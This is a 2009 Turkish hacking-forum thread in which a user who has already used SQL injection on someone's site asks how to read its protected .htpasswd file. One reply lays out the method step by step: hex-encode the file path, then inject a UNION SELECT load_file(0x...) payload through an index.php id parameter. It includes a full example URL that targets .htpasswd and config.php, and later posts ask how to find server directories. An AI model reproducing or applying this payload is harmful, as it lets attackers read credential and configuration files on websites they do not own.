.htpasswd şifrelenmiş ise ?

**SpeedyBoy** · 06-06-09 05:06 PM

Arkadaslar sitenin birinde sql ile admin bilgilerini çektim ama .htpasswd şifrelenmiş.Bunun için tacsızkral ın bi videosunu izledim ama orda /home/site/domains/site.com.tr/public_html/.htpasswd olan yeri hexleyerek load file ile yukluyor ama ben bi türlü /home/site/domains/site.com.tr/public_html/.htpasswd hexleyemedim.Nasıl yapıcam yardım lütfen

**SysTem Expert51** · 09-06-09 02:59 PM

uslubeyin yaptıgı bi program var .bunu bi dene

Text2Hex.exe - File Shared from Box.net - Free Online File Storage

**MicHeLoNy** · 05-07-09 08:49 PM

load file nin on olması lazım bende aynı dertten gidiyom

**Prens** · 06-07-09 12:30 PM

Online SQL Injection and XSS Conversion Tools

girin altta

MySQL Hex var işaretleyin sonra mesela okumak istediğiniz dosya dizini ne mesela

/home/site/domains/site.com.tr/public_html/.htpasswd

bu yada
/home/site/domains/site.com.tr/public_html/config.php bunu kopyalayıp oraya yapıştırıp

convert dediğinizde size hex değenizi verecektir. örnek

DİZİN= /home/site/domains/site.com.tr/public_html/.htpasswd

Hex Değeri= 0x2f686f6d652f736974652f646f6d61696e732f736974652e 636f6d2e74722f7075626c69635f68746d6c2f2e6874706173 737764

Okumak için ise site.com/index.php?id=1+union+select+0,1,2,3-- gibi sql değeri girdiniz ekrana 1 vurdu hemen gireceğimiz komut

load_file(HEX DEĞER KODU)

site.com/index.php?id=1+union+select+0,load_file(0x2f686f6d 652f736974652f646f6d61696e732f736974652e636f6d2e74 722f7075626c69635f68746d6c2f2e6874706173737764),2, 3--

kolay gelsin.

**MicHeLoNy** · 10-07-09 01:34 AM

sitenin dizinini bulma konusunda önereceğin bişey varmı?
dizin sorunu yaşıyorum /usr/local/siteadı .. die gidiyo
.htpasswd /cgi-bin/.htpasswd denedim ama 2 side değil

Konu: .htpasswd şifrelenmiş ise ?

LinkBack

Seçenekler

Display

.htpasswd şifrelenmiş ise ?

Konu Bilgileri

Users Browsing this Thread

Bookmarks

Bookmarks

Yetkileriniz